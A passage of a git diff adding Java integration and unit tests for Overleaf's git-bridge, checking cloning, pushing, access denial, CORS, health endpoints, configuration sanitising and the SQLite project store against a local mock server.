+ public void canServePushedFiles() throws IOException, ExecutionException, InterruptedException { + // + // I don't think we can test this completely without some changes to the mock server, because we + // have no way + // of pausing the test while the push is in progress. Once the push is over, the file isn't + // actually there for + // us to fetch any more. We can however test the access and error conditions, which comprise + // most of the logic. 
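+    // The assertions below therefore only cover the 404 paths: no key, an
+    // invalid project, and a bad key.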
+ // + int gitBridgePort = 33873; + int mockServerPort = 3873; + + server = new MockSnapshotServer(mockServerPort, getResource("/canServePushedFiles").toFile()); + server.start(); + server.setState(states.get("canServePushedFiles").get("state")); + + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + + File testprojDir = gitClone(PROJECT_ID, gitBridgePort, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canServePushedFiles/state/" + PROJECT_ID), testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + gitPush(testprojDir); + + // With no key, we should get a 404. + String url = "http://127.0.0.1:" + gitBridgePort + "/api/testproj/push.tex"; + Response response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(404, response.getStatusCode()); + + // With an invalid project and no key, we should get a 404. + url = "http://127.0.0.1:" + gitBridgePort + "/api/notavalidproject/push.tex"; + response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(404, response.getStatusCode()); + + // With a bad key for a valid project, we should get a 404. + url = "http://127.0.0.1:" + gitBridgePort + "/api/testproj/push.tex?key=notavalidkey"; + response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(404, response.getStatusCode()); + + // With a bad key for an invalid project, we should get a 404. + url = "http://127.0.0.1:" + gitBridgePort + "/api/notavalidproject/push.tex?key=notavalidkey"; + response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(404, response.getStatusCode()); + } + + @Test + public void wlgbCanSwapProjects() throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3874, getResource("/wlgbCanSwapProjects").toFile()); + server.start(); + server.setState(states.get("wlgbCanSwapProjects").get("state")); + wlgb = + new GitBridgeApp( + new String[] { + makeConfigFile(33874, 3874, new SwapJobConfig(1, 0, 0, 250, null, true)) + }); + wlgb.run(); + File rootGitDir = new File(wlgb.config.getRootGitDirectory()); + File testProj1ServerDir = new File(rootGitDir, PROJECT_ID1); + File testProj2ServerDir = new File(rootGitDir, PROJECT_ID2); + File testProj1Dir = gitClone(PROJECT_ID1, 33874, dir); + assertTrue(testProj1ServerDir.exists()); + assertFalse(testProj2ServerDir.exists()); + gitClone(PROJECT_ID2, 33874, dir); + while (testProj1ServerDir.exists()) + ; + assertFalse(testProj1ServerDir.exists()); + assertTrue(testProj2ServerDir.exists()); + FileUtils.deleteDirectory(testProj1Dir); + gitClone(PROJECT_ID1, 33874, dir); + while (testProj2ServerDir.exists()) + ; + assertTrue(testProj1ServerDir.exists()); + assertFalse(testProj2ServerDir.exists()); + } + + private static final List<String> EXPECTED_OUT_PUSH_SUBMODULE = + Arrays.asList( + "remote: hint: Your Git repository contains a reference we cannot resolve.", + "remote: hint: If your project contains a Git submodule,", + "remote: hint: please remove it and try again.", + "To http://127.0.0.1:33875/" + PROJECT_ID, + "! 
[remote rejected] master -> master (invalid git repo)", + "error: failed to push some refs to 'http://127.0.0.1:33875/" + PROJECT_ID + "'"); + + @Test + public void pushSubmoduleFailsWithInvalidGitRepo() + throws IOException, GitAPIException, InterruptedException { + server = + new MockSnapshotServer(3875, getResource("/pushSubmoduleFailsWithInvalidGitRepo").toFile()); + server.start(); + server.setState(states.get("pushSubmoduleFailsWithInvalidGitRepo").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33875, 3875)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33875, dir); + runtime.exec("mkdir sub", null, testprojDir).waitFor(); + File sub = new File(testprojDir, "sub"); + runtime.exec("touch sub.txt", null, sub).waitFor(); + gitInit(sub); + gitAdd(sub); + gitCommit(sub, "sub"); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + List<String> actual = Util.linesFromStream(push.getErrorStream(), 2, "[K"); + assertEquals(EXPECTED_OUT_PUSH_SUBMODULE, actual); + } + + @Test + public void usesCustomErrorHandler() + throws IOException, ExecutionException, InterruptedException { + + int gitBridgePort = 33873; + int mockServerPort = 3873; + + server = new MockSnapshotServer(mockServerPort, getResource("/canServePushedFiles").toFile()); + server.start(); + server.setState(states.get("canServePushedFiles").get("state")); + + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + + // With an invalid project and no key, we should get a 404, + // which is rendered by our custom error handler. + String url = "http://127.0.0.1:" + gitBridgePort + "/api/notavalidproject/main.tex"; + Response response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(404, response.getStatusCode()); + assertEquals("{\"message\":\"HTTP error 404\"}", response.getResponseBody()); + + // With an unsupported URL outside the api, the request is assumed to + // be from a git client and we should get a 401 because the request + // does not include basic auth credentials. 
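+    // (The /api request above was served the JSON error body by the custom
+    // handler; bare git paths get the basic-auth challenge instead.)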
+ url = "http://127.0.0.1:" + gitBridgePort + "/foo"; + response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(401, response.getStatusCode()); + } + + @Test + public void cannotCloneAProtectedProjectWithoutAuthentication() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33883; + int mockServerPort = 3883; + + server = + new MockSnapshotServer( + mockServerPort, + getResource("/cannotCloneAProtectedProjectWithoutAuthentication").toFile()); + server.start(); + server.setState(states.get("cannotCloneAProtectedProjectWithoutAuthentication").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/" + PROJECT_ID, + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + } + + @Test + public void cannotCloneA4xxProject() throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33879; + int mockServerPort = 3879; + + server = + new MockSnapshotServer(mockServerPort, getResource("/cannotCloneA4xxProject").toFile()); + server.start(); + server.setState(states.get("cannotCloneA4xxProject").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/" + PROJECT_ID, + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + } + + @Test + public void cannotCloneAMissingProject() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33880; + int mockServerPort = 3880; + + server = + new MockSnapshotServer(mockServerPort, getResource("/cannotCloneAMissingProject").toFile()); + server.start(); + server.setState(states.get("cannotCloneAMissingProject").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/" + PROJECT_ID, + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + } + + @Test + public void canMigrateRepository() throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33881; + int mockServerPort = 3881; + server = new MockSnapshotServer(mockServerPort, getResource("/canMigrateRepository").toFile()); + server.start(); + server.setState(states.get("canMigrateRepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, gitBridgePort, dir); + File testprojDir2 = gitClone(PROJECT_ID2, gitBridgePort, dir); + // Second project content is equal to content of the first + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canMigrateRepository/state/" + PROJECT_ID), testprojDir2.toPath())); + } + + @Test + public void skipMigrationWhenMigratedFromMissing() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33882; + int mockServerPort = 3882; + server = + new MockSnapshotServer( + mockServerPort, getResource("/skipMigrationWhenMigratedFromMissing").toFile()); + server.start(); + server.setState(states.get("skipMigrationWhenMigratedFromMissing").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + // don't clone the source project first + File 
testprojDir2 = gitClone(PROJECT_ID2, gitBridgePort, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/skipMigrationWhenMigratedFromMissing/state/" + PROJECT_ID2), + testprojDir2.toPath())); + } + + @Test + public void canCloneAMigratedRepositoryWithoutChanges() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33883; + int mockServerPort = 3883; + server = + new MockSnapshotServer( + mockServerPort, getResource("/canCloneAMigratedRepositoryWithoutChanges").toFile()); + server.start(); + server.setState(states.get("canCloneAMigratedRepositoryWithoutChanges").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, gitBridgePort, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canCloneAMigratedRepositoryWithoutChanges/state/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void rejectV1Repository() throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33884; + int mockServerPort = 3884; + server = new MockSnapshotServer(mockServerPort, getResource("/rejectV1Repository").toFile()); + server.start(); + server.setState(states.get("rejectV1Repository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/1234bbccddff.git", + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + } + + @Test + public void cannotCloneAHasDotGitProject() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33885; + int mockServerPort = 3885; + + server = + new MockSnapshotServer( + mockServerPort, getResource("/cannotCloneAHasDotGitProject").toFile()); + server.start(); + server.setState(states.get("cannotCloneAHasDotGitProject").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/conflict.git", + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + wlgb.stop(); + } + + @Test + public void cannotCloneProjectWithSlash() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33886; + int mockServerPort = 3886; + + server = new MockSnapshotServer(mockServerPort, getResource("/canCloneARepository").toFile()); + server.start(); + server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/project/1234abcd", + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + + List<String> actual = Util.linesFromStream(gitProcess.getErrorStream(), 0, ""); + assertEquals( + Arrays.asList( + "Cloning into '1234abcd'...", + "remote: Invalid Project ID (must not have a '/project' prefix)", + "fatal: repository 'http://127.0.0.1:33886/project/1234abcd/' not found"), + actual); + + wlgb.stop(); + } + + @Test + public void testStatusAndHealthCheckEndpoints() throws ClientProtocolException, IOException { + int gitBridgePort = 33887; + int mockServerPort = 3887; + server = new MockSnapshotServer(mockServerPort, getResource("/canCloneARepository").toFile()); + server.start(); + 
server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + HttpClient client = HttpClients.createDefault(); + String urlBase = "http://127.0.0.1:" + gitBridgePort; + // Status + HttpGet statusRequest = new HttpGet(urlBase + "/status"); + HttpResponse statusResponse = client.execute(statusRequest); + assertEquals(200, statusResponse.getStatusLine().getStatusCode()); + // Health Check + HttpGet healthCheckRequest = new HttpGet(urlBase + "/health_check"); + HttpResponse healthCheckResponse = client.execute(healthCheckRequest); + assertEquals(200, healthCheckResponse.getStatusLine().getStatusCode()); + } + + @Test + public void testStatusAndHealthCheckEndpointsWithTrailingSlash() + throws ClientProtocolException, IOException { + int gitBridgePort = 33888; + int mockServerPort = 3888; + server = new MockSnapshotServer(mockServerPort, getResource("/canCloneARepository").toFile()); + server.start(); + server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + HttpClient client = HttpClients.createDefault(); + String urlBase = "http://127.0.0.1:" + gitBridgePort; + // Status + HttpGet statusRequest = new HttpGet(urlBase + "/status/"); + HttpResponse statusResponse = client.execute(statusRequest); + assertEquals(200, statusResponse.getStatusLine().getStatusCode()); + // Health Check + HttpGet healthCheckRequest = new HttpGet(urlBase + "/health_check/"); + HttpResponse healthCheckResponse = client.execute(healthCheckRequest); + assertEquals(200, healthCheckResponse.getStatusLine().getStatusCode()); + } + + @Test + public void testStatusAndHealthCheckEndpointsWithHead() + throws ClientProtocolException, IOException { + int gitBridgePort = 33889; + int mockServerPort = 3889; + server = new MockSnapshotServer(mockServerPort, getResource("/canCloneARepository").toFile()); + server.start(); + server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + HttpClient client = HttpClients.createDefault(); + String urlBase = "http://127.0.0.1:" + gitBridgePort; + // Status + HttpHead statusRequest = new HttpHead(urlBase + "/status"); + HttpResponse statusResponse = client.execute(statusRequest); + assertEquals(200, statusResponse.getStatusLine().getStatusCode()); + // Health Check + HttpHead healthCheckRequest = new HttpHead(urlBase + "/health_check"); + HttpResponse healthCheckResponse = client.execute(healthCheckRequest); + assertEquals(200, healthCheckResponse.getStatusLine().getStatusCode()); + } + + @Test + public void gitLfsBatchEndpoint() throws ClientProtocolException, IOException, ParseException { + int gitBridgePort = 33890; + int mockServerPort = 3890; + server = new MockSnapshotServer(mockServerPort, getResource("/canCloneARepository").toFile()); + server.start(); + server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + HttpClient client = HttpClients.createDefault(); + String urlBase = "http://git:password@127.0.0.1:" + gitBridgePort; + HttpPost gitLfsRequest = + new HttpPost(urlBase + "/5f2419407929eb0026641967.git/info/lfs/objects/batch"); + HttpResponse gitLfsResponse = client.execute(gitLfsRequest); + assertEquals(422, 
gitLfsResponse.getStatusLine().getStatusCode()); + HttpEntity entity = gitLfsResponse.getEntity(); + String responseString = EntityUtils.toString(entity, "UTF-8"); + assertTrue(responseString.contains("Git LFS is not supported on Overleaf")); + } + + @Test + public void canPullIgnoredForceAddedFile() throws IOException, InterruptedException { + int gitBridgePort = 33891; + int mockServerPort = 3891; + server = + new MockSnapshotServer( + mockServerPort, getResource("/canPullIgnoredForceAddedFile").toFile()); + server.start(); + server.setState(states.get("canPullIgnoredForceAddedFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + File testProjDir = gitClone(PROJECT_ID, gitBridgePort, dir); + File one = new File(testProjDir, "sub/one.txt"); + one.createNewFile(); + FileWriter fw = new FileWriter(one.getPath()); + fw.write("1"); + fw.close(); + assertEquals(0, runtime.exec("git add -A -f", null, testProjDir).waitFor()); + gitCommit(testProjDir, "push"); + gitPush(testProjDir); + server.setState(states.get("canPullIgnoredForceAddedFile").get("withUpdatedMainFile")); + gitPull(testProjDir); + File f = new File(testProjDir.getPath() + "/sub/one.txt"); + assertTrue(f.exists()); + } + + @Test + public void canPullIgnoredFileFromOverleaf() throws IOException, InterruptedException { + int gitBridgePort = 33892; + int mockServerPort = 3892; + server = + new MockSnapshotServer( + mockServerPort, getResource("/canPullIgnoredForceAddedFile").toFile()); + server.start(); + server.setState(states.get("canPullIgnoredForceAddedFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + File testProjDir = gitClone(PROJECT_ID, gitBridgePort, dir); + server.setState(states.get("canPullIgnoredForceAddedFile").get("withUpdatedMainFile")); + gitPull(testProjDir); + File f = new File(testProjDir.getPath() + "/sub/one.txt"); + assertTrue(f.exists()); + } + + @Test + public void noCors() throws IOException, ExecutionException, InterruptedException { + + int gitBridgePort = 33893; + int mockServerPort = 3893; + + server = new MockSnapshotServer(mockServerPort, getResource("/canServePushedFiles").toFile()); + server.start(); + server.setState(states.get("canServePushedFiles").get("state")); + + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + + String url = "http://127.0.0.1:" + gitBridgePort + "/status"; + Response response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(200, response.getStatusCode()); + assertEquals("ok\n", response.getResponseBody()); + assertNull(response.getHeader("Access-Control-Allow-Origin")); + } + + @Test + public void cors() throws IOException, ExecutionException, InterruptedException { + + int gitBridgePort = 33894; + int mockServerPort = 3894; + + server = new MockSnapshotServer(mockServerPort, getResource("/canServePushedFiles").toFile()); + server.start(); + server.setState(states.get("canServePushedFiles").get("state")); + + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + + String url = "http://127.0.0.1:" + gitBridgePort + "/status"; + + // Success + Response response = + asyncHttpClient() + .prepareOptions(url) + .setHeader("Origin", "https://localhost") + .execute() + .get(); + assertEquals(200, response.getStatusCode()); + assertEquals("", response.getResponseBody()); + assertEquals("https://localhost", 
response.getHeader("Access-Control-Allow-Origin")); + + response = + asyncHttpClient().prepareGet(url).setHeader("Origin", "https://localhost").execute().get(); + assertEquals(200, response.getStatusCode()); + assertEquals("ok\n", response.getResponseBody()); + assertEquals("https://localhost", response.getHeader("Access-Control-Allow-Origin")); + + // Deny + response = + asyncHttpClient() + .prepareOptions(url) + .setHeader("Origin", "https://not-localhost") + .execute() + .get(); + assertEquals(403, response.getStatusCode()); + assertEquals("", response.getResponseBody()); + assertNull(response.getHeader("Access-Control-Allow-Origin")); + + response = + asyncHttpClient() + .prepareGet(url) + .setHeader("Origin", "https://not-localhost") + .execute() + .get(); + assertEquals(200, response.getStatusCode()); + assertEquals("ok\n", response.getResponseBody()); + assertNull(response.getHeader("Access-Control-Allow-Origin")); + } + + private String makeConfigFile(int port, int apiPort) throws IOException { + return makeConfigFile(port, apiPort, null); + } + + private String makeConfigFile(int port, int apiPort, SwapJobConfig swapCfg) throws IOException { + File wlgb = folder.newFolder(); + File config = folder.newFile(); + PrintWriter writer = new PrintWriter(config); + String cfgStr = + "{\n" + + " \"port\": " + + port + + ",\n" + + " \"bindIp\": \"127.0.0.1\",\n" + + " \"idleTimeout\": 30000,\n" + + " \"rootGitDirectory\": \"" + + wlgb.getAbsolutePath() + + "\",\n" + + " \"allowedCorsOrigins\": \"https://localhost\",\n" + + " \"apiBaseUrl\": \"http://127.0.0.1:" + + apiPort + + "/api/v0\",\n" + + " \"postbackBaseUrl\": \"http://127.0.0.1:" + + port + + "\",\n" + + " \"serviceName\": \"Overleaf\",\n" + + " \"oauth2Server\": \"http://127.0.0.1:" + + apiPort + + "\""; + if (swapCfg != null) { + cfgStr += + ",\n" + + " \"swapStore\": {\n" + + " \"type\": \"memory\",\n" + + " \"awsAccessKey\": null,\n" + + " \"awsSecret\": null,\n" + + " \"s3BucketName\": \"com.overleaf.testbucket\"\n" + + " },\n" + + " \"swapJob\": {\n" + + " \"allowUnsafeStores\": true," + + " \"minProjects\": " + + swapCfg.getMinProjects() + + ",\n" + + " \"lowGiB\": " + + swapCfg.getLowGiB() + + ",\n" + + " \"highGiB\": " + + swapCfg.getHighGiB() + + ",\n" + + " \"intervalMillis\": " + + swapCfg.getIntervalMillis() + + " }\n"; + } + cfgStr += "}\n"; + writer.print(cfgStr); + writer.close(); + return config.getAbsolutePath(); + } + + private Path getResource(String path) { + return Paths.get( + "src/test/resources/" + "uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest" + path); + } + + private InputStream getResourceAsStream(String path) { + try { + return new FileInputStream(getResource(path).toFile()); + } catch (FileNotFoundException e) { + throw new RuntimeException(e); + } + } + + private static String withoutWhitespace(String s) { + return s.replaceAll("\\s", ""); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/config/ConfigTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/config/ConfigTest.java new file mode 100644 index 0000000..8c102db --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/config/ConfigTest.java @@ -0,0 +1,95 @@ +package uk.ac.ic.wlgitbridge.application.config; + +import static org.junit.Assert.*; + +import java.io.Reader; +import java.io.StringReader; +import org.junit.Test; + +/* + * Created by winston on 25/10/15. 
+ */ +public class ConfigTest { + + @Test + public void testConstructWithOauth() { + Reader reader = + new StringReader( + "{\n" + + " \"port\": 80,\n" + + " \"bindIp\": \"127.0.0.1\",\n" + + " \"idleTimeout\": 30000,\n" + + " \"rootGitDirectory\": \"/var/wlgb/git\",\n" + + " \"apiBaseUrl\": \"http://127.0.0.1:60000/api/v0\",\n" + + " \"postbackBaseUrl\": \"http://127.0.0.1\",\n" + + " \"serviceName\": \"Overleaf\",\n" + + " \"oauth2Server\": \"https://www.overleaf.com\"\n" + + "}\n"); + Config config = new Config(reader); + assertEquals(80, config.getPort()); + assertEquals("/var/wlgb/git", config.getRootGitDirectory()); + assertEquals("http://127.0.0.1:60000/api/v0/", config.getAPIBaseURL()); + assertEquals("http://127.0.0.1/", config.getPostbackURL()); + assertEquals("Overleaf", config.getServiceName()); + assertEquals("https://www.overleaf.com", config.getOauth2Server()); + } + + @Test(expected = AssertionError.class) + public void testConstructWithoutOauth() { + Reader reader = + new StringReader( + "{\n" + + " \"port\": 80,\n" + + " \"bindIp\": \"127.0.0.1\",\n" + + " \"idleTimeout\": 30000,\n" + + " \"rootGitDirectory\": \"/var/wlgb/git\",\n" + + " \"apiBaseUrl\": \"http://127.0.0.1:60000/api/v0\",\n" + + " \"postbackBaseUrl\": \"http://127.0.0.1\",\n" + + " \"serviceName\": \"Overleaf\",\n" + + " \"oauth2Server\": null\n" + + "}\n"); + Config config = new Config(reader); + assertEquals(80, config.getPort()); + assertEquals("/var/wlgb/git", config.getRootGitDirectory()); + assertEquals("http://127.0.0.1:60000/api/v0/", config.getAPIBaseURL()); + assertEquals("http://127.0.0.1/", config.getPostbackURL()); + assertEquals("Overleaf", config.getServiceName()); + assertNull(config.getOauth2Server()); + } + + @Test + public void asSanitised() throws Exception { + Reader reader = + new StringReader( + "{\n" + + " \"port\": 80,\n" + + " \"bindIp\": \"127.0.0.1\",\n" + + " \"idleTimeout\": 30000,\n" + + " \"rootGitDirectory\": \"/var/wlgb/git\",\n" + + " \"apiBaseUrl\": \"http://127.0.0.1:60000/api/v0\",\n" + + " \"postbackBaseUrl\": \"http://127.0.0.1\",\n" + + " \"serviceName\": \"Overleaf\",\n" + + " \"oauth2Server\": \"https://www.overleaf.com\"\n" + + "}\n"); + Config config = new Config(reader); + String expected = + "{\n" + + " \"port\": 80,\n" + + " \"bindIp\": \"127.0.0.1\",\n" + + " \"idleTimeout\": 30000,\n" + + " \"rootGitDirectory\": \"/var/wlgb/git\",\n" + + " \"allowedCorsOrigins\": [],\n" + + " \"apiBaseURL\": \"http://127.0.0.1:60000/api/v0/\",\n" + + " \"postbackURL\": \"http://127.0.0.1/\",\n" + + " \"serviceName\": \"Overleaf\",\n" + + " \"oauth2Server\": \"https://www.overleaf.com\",\n" + + " \"userPasswordEnabled\": false,\n" + + " \"repoStore\": null,\n" + + " \"swapStore\": null,\n" + + " \"swapJob\": null,\n" + + " \"sqliteHeapLimitBytes\": 0\n" + + "}"; + assertEquals( + "sanitised config did not hide sensitive fields", expected, config.getSanitisedString()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/BridgeTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/BridgeTest.java new file mode 100644 index 0000000..e27c348 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/BridgeTest.java @@ -0,0 +1,87 @@ +package uk.ac.ic.wlgitbridge.bridge; + +import static org.mockito.Mockito.*; + +import java.io.IOException; +import java.util.ArrayDeque; +import java.util.Optional; +import org.junit.Before; +import org.junit.Test; +import uk.ac.ic.wlgitbridge.application.config.Config; +import 
uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; +import uk.ac.ic.wlgitbridge.bridge.gc.GcJob; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.ProjectRepo; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.bridge.resource.ResourceCache; +import uk.ac.ic.wlgitbridge.bridge.snapshot.SnapshotApiFacade; +import uk.ac.ic.wlgitbridge.bridge.swap.job.SwapJob; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; + +/* + * Created by winston on 20/08/2016. + */ +public class BridgeTest { + + private Bridge bridge; + + private ProjectLock lock; + private RepoStore repoStore; + private DBStore dbStore; + private SwapStore swapStore; + private SnapshotApiFacade snapshotAPI; + private ResourceCache resourceCache; + private SwapJob swapJob; + private GcJob gcJob; + + @Before + public void setup() { + lock = mock(ProjectLock.class); + repoStore = mock(RepoStore.class); + dbStore = mock(DBStore.class); + swapStore = mock(SwapStore.class); + snapshotAPI = mock(SnapshotApiFacade.class); + resourceCache = mock(ResourceCache.class); + swapJob = mock(SwapJob.class); + gcJob = mock(GcJob.class); + bridge = + new Bridge( + new Config(0, "", 0, "", null, "", "", "", null, false, null, null, null, 0), + lock, + repoStore, + dbStore, + swapStore, + swapJob, + gcJob, + snapshotAPI, + resourceCache); + } + + @Test + public void shutdownStopsSwapAndGcJobs() { + bridge.startBackgroundJobs(); + verify(swapJob).start(); + verify(gcJob).start(); + bridge.doShutdown(); + verify(swapJob).stop(); + verify(gcJob).stop(); + } + + @Test + public void updatingRepositorySetsLastAccessedTime() + throws IOException, GitUserException, CannotAcquireLockException { + ProjectRepo repo = mock(ProjectRepo.class); + when(repoStore.getExistingRepo("asdf")).thenReturn(repo); + when(dbStore.getProjectState("asdf")).thenReturn(ProjectState.PRESENT); + when(snapshotAPI.projectExists(Optional.empty(), "asdf")).thenReturn(true); + when(snapshotAPI.getDoc(Optional.empty(), "asdf")) + .thenReturn(Optional.of(mock(GetDocResult.class))); + when(snapshotAPI.getSnapshots(any(), any(), anyInt())).thenReturn(new ArrayDeque<>()); + bridge.getUpdatedRepo(Optional.empty(), "asdf"); + verify(dbStore).setLastAccessedTime(eq("asdf"), any()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStoreTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStoreTest.java new file mode 100644 index 0000000..65fe3ed --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStoreTest.java @@ -0,0 +1,135 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite; + +import static org.junit.Assert.assertEquals; +import static org.junit.Assert.assertNull; + +import java.io.IOException; +import java.sql.Timestamp; +import java.time.LocalDateTime; +import java.time.temporal.ChronoUnit; +import org.junit.Before; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; + +/* + * Created by winston on 23/08/2016. 
+ */ +public class SqliteDBStoreTest { + + private SqliteDBStore dbStore; + + @Before + public void setup() throws IOException { + TemporaryFolder tmpFolder = new TemporaryFolder(); + tmpFolder.create(); + dbStore = new SqliteDBStore(tmpFolder.newFile("dbStore.db")); + } + + @Test + public void testGetNumProjects() { + assertEquals(0, dbStore.getNumProjects()); + dbStore.setLatestVersionForProject("asdf", 1); + assertEquals(1, dbStore.getNumProjects()); + dbStore.setLatestVersionForProject("asdf1", 2); + assertEquals(2, dbStore.getNumProjects()); + dbStore.setLatestVersionForProject("asdf1", 3); + assertEquals(2, dbStore.getNumProjects()); + } + + @Test + public void swapTableStartsOutEmpty() { + assertNull(dbStore.getOldestUnswappedProject()); + } + + @Test + public void testGetOldestUnswappedProject() { + dbStore.setLatestVersionForProject("older", 3); + dbStore.setLastAccessedTime( + "older", Timestamp.valueOf(LocalDateTime.now().minus(5, ChronoUnit.SECONDS))); + dbStore.setLatestVersionForProject("asdf", 1); + dbStore.setLastAccessedTime( + "asdf", Timestamp.valueOf(LocalDateTime.now().minus(1, ChronoUnit.SECONDS))); + assertEquals("older", dbStore.getOldestUnswappedProject()); + dbStore.setLastAccessedTime("older", Timestamp.valueOf(LocalDateTime.now())); + assertEquals("asdf", dbStore.getOldestUnswappedProject()); + } + + @Test + public void swapAndRestore() { + String projectName = "something"; + String compression = "bzip2"; + dbStore.setLatestVersionForProject(projectName, 42); + dbStore.swap(projectName, compression); + assertNull(dbStore.getOldestUnswappedProject()); + assertEquals(compression, dbStore.getSwapCompression(projectName)); + // and restore + dbStore.restore(projectName); + assertNull(dbStore.getSwapCompression(projectName)); + } + + @Test + public void noOldestProjectIfAllEvicted() { + dbStore.setLatestVersionForProject("older", 3); + dbStore.swap("older", "bzip2"); + 